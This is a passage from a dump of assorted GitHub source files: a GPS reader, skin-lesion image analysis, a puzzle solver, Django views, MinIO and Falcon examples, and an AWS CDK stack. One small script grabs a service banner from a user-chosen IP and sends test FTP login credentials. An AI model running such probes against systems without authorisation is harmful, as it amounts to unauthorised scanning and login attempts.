dateutil.tz import tzutc, tzlocal\nfrom queue import Queue\nfrom os import getpid\nimport numpy as np\nimport threading\nimport datetime\nimport serial\nimport time\n\nclass GPS(threading.Thread):\n\n R_EARTH = 6378137.0\n E = 0.08181919\n E_SQ = np.power(E, 2)\n LAT = 0\n LON = 1\n ALT = 2\n \n def __init__(self, serialPort, baudRate, debug=False):\n threading.Thread.__init__(self)\n self.debug = debug\n self.serialPort = serialPort\n self.baudRate = baudRate\n self.daemon = True\n self.stop = threading.Event()\n self.messageQ = Queue()\n self.commandQ = Queue()\n\n self.date = datetime.date.today()\n self.position = np.array([0, 0, 0], dtype=np.float)\n self.prevPosition = np.array([0, 0, 0], dtype=np.float)\n self.positionChanged = False\n self.timeSinceLastPositionChange = time.time()\n self.positionUpdateRate = 0\n \n self.totalDistance = np.array([[0], [0], [0]], dtype=np.float)\n self.velocity = np.array([0, 0, 0], dtype=np.float)\n self.acceleration = np.array([0, 0, 0], dtype=np.float)\n\n print(getpid(), 'Creating GPS...')\n\n def geodeticToECEF(self, position):\n\n latitude = np.deg2rad(position[self.LAT]) # phi\n longitude = np.deg2rad(position[self.LON]) # lambda\n altitude = position[self.ALT]\n\n ne = self.R_EARTH / np.sqrt(1 - self.E_SQ * np.power(np.sin(latitude), 2))\n \n return np.array([\n [(ne + altitude) * np.cos(latitude) * np.cos(longitude)],\n [(ne + altitude) * np.cos(latitude) * np.sin(longitude)],\n [(ne * (1 - self.E_SQ) + altitude) * np.sin(latitude)]\n ], dtype=np.float)\n\n def nmeaToGeodetic(self, latitude, latitudeDirection, longitude, longitudeDirection, altitude):\n\n # Convert NMEA latitude to geodetic latitude.\n latitudeHours = int(float(latitude) / 100.0)\n latitudeMinutes = (float(latitude) % 100.0) / 60.0\n correctedLatitude = latitudeHours + latitudeMinutes\n if latitudeDirection == 'S':\n correctedLatitude *= -1\n\n # Convert NMEA longitude to geodetic longitude.\n longitudeHours = int(float(longitude) / 100.0)\n longitudeMinutes = (float(longitude) % 100.0) / 60.0\n correctedLongitude = longitudeHours + longitudeMinutes\n if longitudeDirection == 'W':\n correctedLongitude *= -1\n\n # Process altitude. Result is in meters.\n correctedAltitude = float(altitude) \n\n return np.array([correctedLatitude, correctedLongitude, correctedAltitude], dtype=np.float)\n\n def getRotationMatrix(self, position):\n\n latitude = np.deg2rad(position[self.LAT]) # phi\n longitude = np.deg2rad(position[self.LON]) # lambda\n\n return np.array([\n [-np.sin(latitude) * np.cos(longitude), -np.sin(latitude) * np.sin(longitude), np.cos(latitude)],\n [-np.sin(longitude), np.cos(longitude), 0],\n [-np.cos(latitude) * np.cos(longitude), -np.cos(latitude) * np.sin(longitude), -np.sin(latitude)]\n ], dtype=np.float)\n\n def calculateBodyDynamics(self):\n \"\"\"\n self.position [lat, lon, alt]\n self.prevPosition [lat, lon, alt]\n self.timeSinceLastPositionChange [seconds]\n \"\"\"\n\n if np.linalg.norm(self.prevPosition) == 0:\n self.prevPosition = self.position.copy()\n\n prevPositionECEF = self.geodeticToECEF(self.prevPosition)\n rotationMatrix = self.getRotationMatrix(self.prevPosition)\n\n positionECEF = self.geodeticToECEF(self.position)\n\n deltaECEF = positionECEF - prevPositionECEF\n\n self.velocity = deltaECEF/self.positionUpdateRate\n self.acceleration = self.velocity/self.positionUpdateRate\n\n self.totalDistance += np.absolute(np.matmul(rotationMatrix, deltaECEF))\n\n # print('\\nNew Point: ')\n # print(np.matmul(self.rotationMatrix, deltaECEF))\n # print(deltaECEF)\n # print(self.position)\n #print(positionECEF)\n\n def processData(self, raw):\n \"\"\"\n Processes the raw data obtained by the gps serial interface. The data obtained\n consists of several message types which after being identified, must be stripped\n and parsed to obatin relevant data.\n - Time and date\n - Latitude\n - Longitude\n - Altitude\n \"\"\"\n\n # Remove new line characters, convert to utf-8 characters and split the string\n # by commas. Make sure that data was received.\n data = raw.strip().decode('utf-8', errors='ignore').split(',')\n if data:\n \n # Obtain the first column of the message to sort them out.\n messageType = data[0]\n\n # Store the rest of the payload in a separate variable.\n payload = data[1:]\n\n if messageType == '$GPGGA':\n # Latitude, longitude and altitude are obtained form this message.\n # Latitude is column 1 from payload, value must be divided by 100 to get degrees.\n # Latitude direction is column 2 from payload, value is 'S' or 'N'\n # Latitude is column 3 from payload, value must be divided by 100 to get degrees.\n # Latitude direction is column 4 from payload, value is 'W' or 'E'\n # Altitude is column 9 from payload, value is in meters.\n\n # Check that data was received.\n if all(payload[1:5]) and payload[8]:\n\n # Store current stored position as previous.\n # This will help determine if a change has occured.\n self.prevPosition = self.position.copy()\n\n # Update current position. Gps data is in NMEA format, convert it to geodetic.\n self.position = self.nmeaToGeodetic(payload[1], payload[2], payload[3], payload[4], payload[8])\n\n # Calculate the change in position\n if np.linalg.norm(self.position - self.prevPosition) > 0.1:\n \n # Set change flag and calculate the time between position updates.\n self.positionChanged = True\n self.positionUpdateRate = time.time() - self.timeSinceLastPositionChange\n self.timeSinceLastPositionChange = time.time()\n \n\n elif messageType == '$GPRMC':\n # Time and date data is obtained from this message.\n # Time is column 0 from payload, format is HMS\n # Date is column 8 from payload, format is MDY\n \n # Check that both columns were received.\n if payload[0] and payload[8]:\n\n # Obtain the current time and date from the gps module.\n # Parse object expects first the date and then the time.\n # The time obtained by the gps is in UTC time.\n utcDate = parse('%s %s UTC' % (payload[8], payload[0]), dayfirst=True)\n \n # Convert the utc date to the local time zone in the system.\n self.date = utcDate.astimezone(tzlocal())\n\n def run(self):\n \"\"\"\n Starts the execution of the thread. Called behind the scenes when\n gps.start() is called.\n \"\"\"\n\n print(getpid(), 'Staring GPS...')\n\n # Wrapping the whole serial port inside of a try-except structure \n # for handling connection errors.\n try:\n\n # Open the serial port with a 'with' statement. This ensures that\n # the port is always closed on exit and available when the application\n # restarts.\n with serial.Serial(port=self.serialPort, baudrate=self.baudRate, timeout=1) as gps:\n \n # Check if the stop flag has been set by the parent process.\n while not self.stop.is_set():\n \n # Read a new line from the gps, timeout is 1 second.\n rawData = gps.readline()\n if rawData:\n\n # If data was obtained process it.\n self.processData(rawData)\n \n # If the position changed send updated position to queue.\n if self.positionChanged:\n self.calculateBodyDynamics()\n self.positionChanged = False\n self.messageQ.put({\n 'position': self.position,\n 'positionUpdateRate': self.positionUpdateRate,\n 'distance': self.totalDistance,\n 'date': self.date.strftime(\"%m/%d/%Y %H:%M:%S\"),\n 'velocity': self.velocity,\n 'acceleration': self.acceleration\n })\n \n # Read commands from the parent thread.\n while not self.commandQ.empty():\n self.commandQ.get()\n self.commandQ.task_done()\n\n except serial.serialutil.SerialException:\n\n # On an exception send message.\n print(getpid(), 'GPS communication can not be opened...')\n time.sleep(1)\n\n print(getpid(), 'Killing GPS...')\n\nif __name__ == '__main__':\n gps = GPS('/dev/ttyUSB0', 4800, debug=True)\n gps.start()\n while gps.isAlive():\n try:\n while not gps.messageQ.empty():\n message = gps.messageQ.get()\n gps.messageQ.task_done()\n if message:\n print('gps ->', message)\n time.sleep(0.2)\n except KeyboardInterrupt:\n break\n gps.stop.set()\n gps.join()","repo_name":"ShadoWolf4/Bachelor-Proyect","sub_path":"V.1/gps.py","file_name":"gps.py","file_ext":"py","file_size_in_byte":10116,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"1443039253","text":"from ctypes import resize\nimport os\nimport sys\nimport numpy as np\nimport cv2\nimport utils as utils\nimport facemesh as facemesh\nimport resize as resize_img\n# import src.face_type.utils as utils\n# import src.face_type.facemesh as facemesh\n\nsys.path.append('src')\nsys.path.append('src/face_type')\n\nclass Lesions:\n def __init__(self):\n return\n\n def lesions(self, image):\n\n gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n blur = cv2.GaussianBlur(gray, (25, 25), 0, borderType=cv2.BORDER_ISOLATED)\n kernel = np.ones((3, 3), np.uint8)\n blur = cv2.dilate(blur, kernel)\n blur = cv2.dilate(blur, kernel)\n res = cv2.adaptiveThreshold(\n blur, 255, cv2.ADAPTIVE_THRESH_MEAN_C, cv2.THRESH_BINARY, 11, 2\n )\n\n return res\n\n def draw(self, image, lesions, points):\n\n rect = cv2.boundingRect(points)\n\n x, y , w, h = rect\n\n H, W, C = image.shape\n\n res = image.copy()\n index_list = np.array(list(np.where(lesions==255)))\n\n for index in zip(index_list[0], index_list[1]):\n x_point = int(index[0] + y)\n y_point = int(index[1] + x)\n res[x_point, y_point, 0] = 0\n res[x_point, y_point, 1] = 255\n res[x_point, y_point, 2] = 255\n\n return res\n\n\n def lesions2(self, image, points):\n\n # 1 Crop and get average, min, max value\n # 2 Color Balancing\n # 3 Normalization of a*\n # res2 = utils.color_balancing(image, points)\n res3 = cv2.cvtColor(image, cv2.COLOR_BGR2Lab)\n min_a, max_a, avg_a = utils.get_mean_from_masked_image( res3[:, :, 1], points)\n _, max_L, avg_L = utils.get_mean_from_masked_image( res3[:, :, 0], points)\n\n if max_a > 140 and (max_a - min_a) >= 10 and (max_a - avg_a) >= 7:\n kernel = np.ones((3, 3), np.uint8)\n res3 = utils.crop_image(res3, points)\n\n alpha = res3[:, :, 1]\n mask=cv2.inRange(alpha,0,8)\n alpha[mask==255]=min_a\n # alpha[mask==255]=avg_a\n\n alpha = cv2.GaussianBlur(alpha, (5,5), 0)\n alpha = cv2.normalize(alpha, None, 0, 255, cv2.NORM_MINMAX)\n # res5, ma = utils.estimation_of_AC(alpha, 255)\n mA = alpha / 255 \n _, res5 = cv2.threshold(mA, 0.6, 255, cv2.THRESH_BINARY)\n # res5 = cv2.blur(res5, (9,9))\n\n res5 = cv2.dilate(res5, kernel, iterations=2) #// make dilation image\n res5 = cv2.erode(res5, kernel, iterations=2)\n\n # res6 = utils.morphology(res5)\n res6 = cv2.GaussianBlur(res5, (5,5), 0)\n\n ret, res = cv2.threshold(res6, 100, 255, cv2.THRESH_BINARY)\n\n res = cv2.morphologyEx(res, cv2.MORPH_OPEN, cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (9,9)))\n res = cv2.dilate(res, kernel, iterations=2) #// make dilation image\n res = cv2.erode(res, kernel, iterations=2)\n\n return res\n return None\n\n \n def draw2(self, image, re_image, acnes, points, re_points):\n\n if acnes is None:\n return image\n\n rect = cv2.boundingRect(points)\n re_rect = cv2.boundingRect(re_points)\n x, y, w, h = rect\n _x, _y, _w, _h = re_rect\n H, W, C = image.shape\n _H, _W, _C = re_image.shape\n mask = np.zeros((H, W, 3), dtype=np.uint8)\n\n acnes = acnes.astype(np.uint8)\n\n temp = image.copy()\n contours, hirerarchy = cv2.findContours(acnes, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)\n\n for contour in contours:\n contour = contour.astype('float32')\n contour /= [_w, _h]\n contour *= [w, h]\n contour += [x, y]\n contour = contour.astype('int32')\n area = cv2.contourArea(contour)\n # contour *= [x, y]\n if area > 180 and area < 800:\n # print(area)\n cv2.drawContours(temp, [contour], -1, (0,255,255), -1)\n # cv2.drawContours(temp, [contour], -1, (0,255,255), -1)\n\n return temp\n\n\n def crop(self, image, points):\n res = utils.crop_image(image, points, \"white\")\n return 255 - res\n\n def run(self, fm, image):\n\n re_image, _, _ = resize_img.run(fm, image, 1000)\n\n H, W, C = image.shape\n h, w, c = re_image.shape\n fm.set_points_loc(w=W, h=H)\n\n res = image.copy()\n face_cheek_right_point = np.array(fm.points_loc[\"face_cheek_right_point\"], dtype=np.int)\n face_cheek_left_point = np.array(fm.points_loc[\"face_cheek_left_point\"], dtype=np.int)\n face_forehead_point = np.array(fm.points_loc[\"face_forehead_point\"], dtype=np.int)\n face_chin_point = np.array(fm.points_loc[\"face_chin_point\"], dtype=np.int)\n # face_nose_point = np.array(fm.points_loc[\"face_nose_point\"], dtype=np.int)\n\n fm.set_points_loc(w=w, h=h)\n re_face_cheek_right_point = np.array(fm.points_loc[\"face_cheek_right_point\"], dtype=np.int)\n re_face_cheek_left_point = np.array(fm.points_loc[\"face_cheek_left_point\"], dtype=np.int)\n re_face_forehead_point = np.array(fm.points_loc[\"face_forehead_point\"], dtype=np.int)\n re_face_chin_point = np.array(fm.points_loc[\"face_chin_point\"], dtype=np.int)\n # re_face_nose_point = np.array(fm.points_loc[\"face_nose_point\"], dtype=np.int)\n\n lesions_img = self.lesions(image)\n # cheek_right = self.lesions(re_image, re_face_cheek_right_point)\n # cheek_left = self.lesions(re_image, re_face_cheek_left_point)\n # chin = self.lesions(re_image, re_face_chin_point)\n forehead = self.lesions2(re_image, re_face_forehead_point)\n # nose = self.lesions3(re_image, re_face_nose_point)\n\n cheek_right = self.crop(lesions_img, face_cheek_right_point)\n cheek_left = self.crop(lesions_img, face_cheek_left_point)\n chin = self.crop(lesions_img, face_chin_point)\n # nose = self.crop(lesions_img, face_nose_point)\n # forehead = self.crop(lesions_img, face_forehead_point)\n\n # lesions_img = self.lesions3(re_image)\n\n # cheek_right = self.crop(lesions_img, re_face_cheek_right_point)\n # cheek_left = self.crop(lesions_img, re_face_cheek_left_point)\n # forehead = self.crop(lesions_img, re_face_forehead_point)\n # chin = self.crop(lesions_img, re_face_chin_point)\n # nose = self.crop(lesions_img, re_face_nose_point)\n\n res = self.draw(image, cheek_right, face_cheek_right_point)\n res = self.draw(res, cheek_left , face_cheek_left_point)\n res = self.draw(res, chin , face_chin_point)\n res = self.draw2(res, re_image, forehead , face_forehead_point, re_face_forehead_point)\n # res = self.draw(res, re_image, nose , face_nose_point, re_face_nose_point)\n\n return res\n\n\n\nif __name__ == \"__main__\":\n\n faceMesh = facemesh.FaceMesh(thickness=5)\n faceMesh.set_label(\n [\n \"face_flushing_right_point\",\n \"face_flushing_left_point\",\n \"face_cheek_right_point\",\n \"face_cheek_left_point\",\n \"face_forehead_point\",\n \"face_chin_point\",\n \"face_nose_point\",\n ]\n )\n\n path = \"Test/\"\n filelist = os.listdir(path)\n\n lesions = Lesions()\n\n print(filelist)\n # filelist = ['input_46e4f730c0.jpg', 'input_0a51f37a14.jpg', 'input_0a2cff1ee6.jpg', 'input_0b8f0af0dc.jpg']\n for filename in filelist[:]:\n if filename.split(\".\")[-1] == \"jpg\":\n print(path+filename)\n image = cv2.imread(path + filename)\n res = lesions.run(faceMesh, image)\n merged = np.hstack((image, res))\n cv2.imwrite(path+filename.split(\".\")[0]+\"_lesions3.png\", merged)\n # cv2.imshow(\"res\", merged)\n # cv2.waitKey(0)\n","repo_name":"cris-j-dev/Skincare","sub_path":"src/face_type/lesions.py","file_name":"lesions.py","file_ext":"py","file_size_in_byte":7915,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"41764533325","text":"#!/usr/bin/python3\n\n'''\nMade by DevStorm Founder\n'''\n\n\nimport socket\n\n\ndef is_valid_ipv4(ip):\n parts = ip.split(\".\")\n if len(parts) != 4:\n return False\n for part in parts:\n try:\n number = int(part)\n except ValueError:\n return False\n if number < 0 or number > 255:\n return False\n return True\n\n\ndef get_ip():\n while True:\n ip = input(\"Digite o IP: \")\n if is_valid_ipv4(ip):\n return ip\n else:\n print(\"IP inválido. Tente novamente.\")\n\n\ndef get_service():\n services = {\n \"FTP\": 21,\n \"SSH\": 22,\n \"Telnet\": 23,\n \"SMTP\": 25,\n \"DNS\": 53,\n \"HTTP\": 80,\n \"POP3\": 110,\n \"IMAP\": 143,\n \"HTTPS\": 443\n }\n while True:\n print(\"Escolha um serviço dos seguintes:\")\n for service in services:\n print(service)\n chosen_service = input()\n if chosen_service in services:\n return services[chosen_service]\n else:\n print(\"Serviço inválido. Tente novamente.\")\n\n\nip = get_ip()\nporta = get_service()\n\ntry:\n meusocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n meusocket.connect((ip, porta))\n\n banner = meusocket.recv(1024)\n print(\"Banner recebido:\", banner.decode())\n\n print(\"Enviando dados para FTP Server - usuário\")\n meusocket.send(b\"USER teste\\r\\n\")\n banner = meusocket.recv(1024)\n print(\"Banner recebido:\", banner.decode())\n\n print(\"Enviando dados para FTP Server - senha\")\n meusocket.send(b\"PASS teste\\r\\n\")\n banner = meusocket.recv(1024)\n print(\"Banner recebido:\", banner.decode())\n\nexcept Exception as e:\n print(\"Erro na conexão:\", str(e))\n\nfinally:\n meusocket.close()\n","repo_name":"BrenoSantanaBruno/My-Tools","sub_path":"Python3/tock_tock_services_protocols.py","file_name":"tock_tock_services_protocols.py","file_ext":"py","file_size_in_byte":1761,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"32504173439","text":"#!/usr/bin/env python3\nimport re\n\n\ninstr_rx = re.compile(r'(\\w+) can fly (\\d+) km/s for (\\d+) seconds, but then must rest for (\\d+) seconds.')\n\ndef parse_instr(text):\n return [(n, *(int(x) for x in (a,b,c))) for n,a,b,c in instr_rx.findall(text)]\n\n\ndef travel(deer, t):\n name,speed,active,snooze = deer\n w = active + snooze\n total = speed * (t // w) * active\n r = min(active, t % w)\n total += r * speed\n return total\n\n\ndef solve(problem, t=2503):\n board = parse_instr(problem)\n return max(travel(x, t) for x in board)\n\n\ndef test():\n assert parse_instr('Vixen can fly 19 km/s for 7 seconds, but then must rest for 124 seconds.') == [('Vixen', 19, 7, 124)]\n\n assert travel(('A', 10, 10, 40), 0) == 0\n assert travel(('A', 10, 10, 40), 1) == 10\n assert travel(('A', 10, 10, 40), 10) == 100\n assert travel(('A', 10, 10, 40), 50) == 100\n assert travel(('A', 10, 10, 40), 51) == 110\n\n problem = \"\"\"\nComet can fly 14 km/s for 10 seconds, but then must rest for 127 seconds.\nDancer can fly 16 km/s for 11 seconds, but then must rest for 162 seconds.\n\"\"\".strip()\n\n assert solve(problem, 1000) == 1120\n\n\ndef getinput():\n import fileinput\n with fileinput.input() as f:\n return ''.join(f).strip()\n\n\nif __name__ == '__main__':\n test()\n print(solve(getinput()))\n","repo_name":"paiv/aoc2015","sub_path":"code/14-1-reindeer/solve.py","file_name":"solve.py","file_ext":"py","file_size_in_byte":1317,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"14196579430","text":"from django.shortcuts import render_to_response\nfrom django.http import HttpResponse\nfrom django.contrib.auth.decorators import login_required\nfrom django.utils import simplejson\nfrom django.http import Http404\nfrom django.contrib.auth.models import User\nfrom django.views.decorators.cache import cache_page\nfrom django.template import RequestContext\nfrom game.models import Board, Score\nfrom contest.models import Contest\nfrom main.views import contests\nimport datetime\n\n@cache_page(60 * 5)\ndef highscores(request, contest):\n try:\n c = Contest.objects.get(id = contest)\n except Contest.DoesNotExist:\n raise Http404\n if request.method == 'POST':\n uname = request.user.username\n bname = request.POST['boardname']\n time = request.POST['time']\n try:\n u = User.objects.get(username=uname)\n except User.DoesNotExist:\n raise Http404\n try:\n b = Board.objects.get(name=bname)\n except Board.DoesNotExist:\n raise Http404\n time_sec = int(time)\n\n #sprawdz czy konkurs jest jeszcze wazny!\n if(c.expiredate < datetime.date.today()):\n return HttpResponse(simplejson.dumps(False), mimetype='application/json')\n\n #1sprawdz czy jest najlepszy\n try: \n #niezmiennik (jest tylko jeden old (tylko tutaj go zmieniam))\n old = c.score.get(board = b)\n except Score.DoesNotExist:\n s = Score(user=u, board = b, time_s = time_sec, date = datetime.datetime.now())\n s.save()\n c.highscores.add(s)\n return HttpResponse(simplejson.dumps(True), mimetype='application/json')\n if (old.time_s > time_sec):\n old.delete()\n s = c.highscores(user = u, board = b, time_s = time_sec, date = datetime.datetime.now())\n s.save()\n c.highscores.add(s)\n return HttpResponse(simplejson.dumps(True), mimetype='application/json')\n else:\n return HttpResponse(simplejson.dumps(False), mimetype='application/json')\n else: \n scores = []\n for s in c.highscores.order_by('time_s'):\n scores.append((s.board.name, s.user, str(s.time_s) + 's'))\n\n return render_to_response('highscores.html', \n {'title': 'Najlepsze wyniki', 'scores': scores, 'contests':contests(request.user)}, context_instance=RequestContext(request)\n )\n\n@login_required\ndef board(request, boardname):\n xhr = request.GET.has_key('xhr')\n\n try:\n b = Board.objects.get(name=boardname)\n except Board.DoesNotExist:\n raise Http404\n\n if xhr:\n return HttpResponse(b.json(), mimetype='application/json')\n\n return render_to_response('board.html', \n {'title': 'Gra'}, context_instance=RequestContext(request)\n\n )\n\n@login_required\ndef boardlist(request, contest = 1):\n option = request.GET.has_key('options')\n if option:\n try:\n c = Contest.objects.get(id = contest)\n except Contest.DoesNotExist:\n raise Http404\n boardsnames = []\n for b in c.boards.all():\n boardsnames.append(str(b))\n return render_to_response('boardsoption.html', {'boardsnames': boardsnames})\n return render_to_response('board.html',\n {'title': 'Gra', 'contest':contest, \n 'contests':contests(request.user)}, context_instance=RequestContext(request)\n )\n","repo_name":"dobrypd/Numberlink","sub_path":"numberlink/game/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3453,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"84"} +{"seq_id":"32915471586","text":"with open(\"input.txt\") as f:\n lines = f.read().split(\"\\n\")\n\nclass Position:\n def __init__(self):\n self.x=0\n self.y=0\n def dist(self, p2):\n return max(abs(self.x-p2.x), abs(self.y-p2.y))\n def follow(self, p2):\n if self.dist(p2)>1:\n if self.x < p2.x:\n self.x += 1\n elif self.x > p2.x:\n self.x -= 1\n if self.y < p2.y:\n self.y += 1\n elif self.y > p2.y:\n self.y -= 1\n\ndef solver(n):\n positions = [Position() for i in range(n)]\n visited=set([(0,0)])\n \n for line in lines:\n direction, count = line.split()\n for _ in range(int(count)):\n if direction in \"UD\":\n m = 1 if direction==\"D\" else -1\n positions[0].y+=m\n for i in range(1,n):\n positions[i].follow(positions[i-1])\n\n else:\n m = 1 if direction==\"R\" else -1\n positions[0].x+=m\n for i in range(1,n):\n positions[i].follow(positions[i-1])\n \n visited.add((positions[-1].y,positions[-1].x))\n return len(visited)\n \nprint(f\"Part1: {solver(2)}\")\nprint(f\"Part2: {solver(10)}\")\n","repo_name":"muraterogl/Advent-Of-Code","sub_path":"2022/day09/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1277,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"28447462363","text":"# python 기본 배열로 큐를 사용하면 매우 느리므로 deque 라이브러리를 사용할 것\nfrom collections import deque\n\n# 이진검색 라이브러리\nimport bisect\n\n# 시계 방향으로 90도 회전\ndef rotate90(arr):\n n = len(arr)\n tmp = [ [0] * n for _ in range(n)]\n for i in range(n):\n for j in range(n):\n tmp[i][j] = arr[n-1-j][i]\n return tmp\n\n# N x N 배열 전체 왼쪽으로 1칸 이동\ndef shift_array_to_left(arr):\n n = len(arr)\n for i in range(n):\n for j in range(n):\n if j+1 > n-1: continue\n arr[i][j], arr[i][j+1] = arr[i][j+1], arr[i][j]\n\n# N x N 배열 전체 위로 1칸 이동\ndef shift_array_to_top(arr):\n n = len(arr)\n for i in range(n):\n for j in range(n):\n if i+1 > n-1: continue\n arr[i][j], arr[i+1][j] = arr[i+1][j], arr[i][j]\n","repo_name":"yebrwe/Algorithm","sub_path":"library/algorithm/array.py","file_name":"array.py","file_ext":"py","file_size_in_byte":868,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"72356449233","text":"from miniopy_async import Minio\nfrom miniopy_async.commonconfig import DISABLED, ENABLED, AndOperator, Filter, Tags\nfrom miniopy_async.replicationconfig import (\n DeleteMarkerReplication,\n Destination,\n ReplicationConfig,\n Rule,\n)\nimport asyncio\n\nclient = Minio(\n \"play.min.io\",\n access_key=\"Q3AM3UQ867SPQQA43P2F\",\n secret_key=\"zuf+tfteSlswRu7BJ86wekitnifILbZam1KYY3TG\",\n secure=True, # http for False, https for True\n)\n\nbucket_tags = Tags.new_bucket_tags()\nbucket_tags[\"Project\"] = \"Project One\"\nbucket_tags[\"User\"] = \"jsmith\"\n\nconfig = ReplicationConfig(\n \"REPLACE-WITH-ACTUAL-ROLE\",\n [\n Rule(\n Destination(\n \"REPLACE-WITH-ACTUAL-DESTINATION-BUCKET-ARN\",\n ),\n ENABLED,\n delete_marker_replication=DeleteMarkerReplication(\n DISABLED,\n ),\n rule_filter=Filter(\n AndOperator(\n \"TaxDocs\",\n bucket_tags,\n ),\n ),\n rule_id=\"rule1\",\n priority=1,\n ),\n ],\n)\n\n\nasync def main():\n await client.set_bucket_replication(\"my-bucket\", config)\n\n\nloop = asyncio.get_event_loop()\nloop.run_until_complete(main())\nloop.close()\n","repo_name":"hlf20010508/miniopy-async","sub_path":"examples/simple_examples/set_bucket_replication.py","file_name":"set_bucket_replication.py","file_ext":"py","file_size_in_byte":1253,"program_lang":"python","lang":"en","doc_type":"code","stars":37,"dataset":"github-code","pt":"84"} +{"seq_id":"16188876740","text":"import falcon\n\nfrom typing import Dict, Tuple, Type, Text, List\nfrom inspect import Parameter\n\nfrom ravel.app.middleware import Middleware\nfrom ravel.apps.web import Endpoint\nfrom ravel.app.base import ActionDecorator\nfrom ravel.ext.falcon.service import FalconService\nfrom ravel.ext.falcon.constants import HTTP_METHODS, HTTP_OPTIONS\n\nDEFAULT_ALLOW_ORIGIN = '*'\nDEFAULT_ALLOW_METHODS = HTTP_METHODS\nDEFAULT_ALLOW_HEADERS = (\n 'Authorization',\n 'Content-Type',\n 'Accept',\n 'Origin',\n 'User-Agent',\n 'DNT',\n 'Cache-Control',\n 'X-Mx-ReqToken',\n 'Keep-Alive',\n 'X-Requested-With',\n 'If-Modified-Since',\n 'Pragma',\n 'Expires',\n)\n\n\nclass SetHttpCorsResponseHeaders(Middleware):\n \"\"\"\n # CORS Middleware\n\n This middleware sets various Access-Control headers needed for CORS.\n \"\"\"\n\n def __init__(\n self,\n allow_origin: Text = DEFAULT_ALLOW_ORIGIN,\n allow_headers: List[Text] = DEFAULT_ALLOW_HEADERS,\n allow_methods: List[Text] = DEFAULT_ALLOW_METHODS,\n ):\n self._allow_origin = allow_origin\n self._allow_headers = allow_headers\n self._allow_methods = allow_methods\n self._cors_headers = {\n 'Access-Control-Allow-Origin': self._allow_origin,\n 'Access-Control-Allow-Methods': ','.join(self._allow_methods),\n 'Access-Control-Allow-Headers': ','.join(self._allow_headers),\n }\n\n @property\n def app_types(self) -> Tuple[Type['Application']]:\n return (FalconService, )\n\n def on_bootstrap(self):\n \"\"\"\n Ensure that every registered route has at least a dummy endpoint\n registered for the OPTIONS HTTP method, adding endpoints as needed.\n \"\"\"\n for res in self.app.falcon_resources.values():\n if not res.is_method_supported(HTTP_OPTIONS):\n endpoint = Endpoint.from_function(\n app=self.app,\n func=lambda *args, **kwargs: None,\n method=HTTP_OPTIONS,\n route=res.route,\n )\n res.add_endpoint(endpoint)\n\n def pre_request(\n self,\n action: 'Action',\n request: 'Request',\n raw_args: Tuple,\n raw_kwargs: Dict\n ):\n \"\"\"\n Set CORS headers on OPTIONS requests as well as tell Falcon and Ravel\n to abort both further middleware processing and the target/respondor\n method, going right to post-request middleware instead.\n \"\"\"\n falcon_request, falcon_response = raw_args[:2]\n falcon_response.set_headers(self._cors_headers)","repo_name":"gigaquads/ravel","sub_path":"ravel/ext/falcon/middleware/set_http_cors_response_headers.py","file_name":"set_http_cors_response_headers.py","file_ext":"py","file_size_in_byte":2614,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"84"} +{"seq_id":"24561617409","text":"# PRD-01 Cloud6.Sentia1\n#\n# Project: MVP v1.1\n#\n### Importing the necessary libraries\n\nimport os.path\nimport aws_acm_certified as acm\nfrom urllib import response\nimport aws_cdk as cdk\nfrom aws_cdk import (\n Duration,\n aws_ec2 as ec2,\n aws_iam as iam,\n aws_backup as backup,\n aws_events as event,\n aws_kms as kms,\n aws_s3 as s3,\n aws_s3_deployment as s3deploy,\n aws_elasticloadbalancingv2 as elbv2,\n aws_elasticloadbalancingv2_targets as targets,\n aws_autoscaling as autoscaling,\n aws_ssm as ssm,\n RemovalPolicy,\n CfnOutput,\n App,\n Stack,\n Tags,\n)\nfrom cdk_iam_floyd import Autoscaling, Elasticloadbalancing, ElasticloadbalancingV2\nfrom constructs import Construct\nfrom cdk_ec2_key_pair import KeyPair\nfrom aws_cdk.aws_events import Schedule\nfrom aws_cdk.aws_s3_assets import Asset\nfrom aws_cdk.aws_certificatemanager import Certificate\nfrom aws_cdk.aws_elasticloadbalancingv2 import SslPolicy\n\n\n### directory variable\ndirname = os.path.dirname(__file__)\n\n\n#################### STACK ####################\n\n\nclass Mvpscript11Stack(Stack):\n def __init__(self, scope: Construct, construct_id: str, **kwargs) -> None:\n super().__init__(scope, construct_id, **kwargs)\n\n #################### Parameter Setup ####################\n\n # VPCs\n environments = self.node.try_get_context(\"ENVIRONMENTS\")\n vpcs_environment = environments.get(\"vpcs\")\n mngt_name = vpcs_environment.get(\"mngt_name\")\n mngt_cidr_block = vpcs_environment.get(\"mngt_cidr_block\")\n mngt_cidr_mask = vpcs_environment.get(\"mngt_cidr_mask\")\n mngt_subnet_name = vpcs_environment.get(\"mngt_subnet_name\")\n mngt_max_azs = vpcs_environment.get(\"mngt_max_azs\")\n\n asg_name = vpcs_environment.get(\"asg_name\")\n asg_cidr_block = vpcs_environment.get(\"asg_cidr_block\")\n asg_cidr_mask = vpcs_environment.get(\"asg_cidr_mask\")\n public_asg_subnet_name = vpcs_environment.get(\"public_asg_subnet_name\")\n private_asg_subnet_name = vpcs_environment.get(\"private_asg_subnet_name\")\n asg_max_azs = vpcs_environment.get(\"asg_max_azs\")\n\n vpcp_name = vpcs_environment.get(\"vpcp_name\")\n vpcp_region = vpcs_environment.get(\"vpcp_region\")\n\n # Roles\n roles_environment = environments.get(\"roles\")\n iam_ssm_role = roles_environment.get(\"iam_ssm_role\")\n iam_ssm_principal = 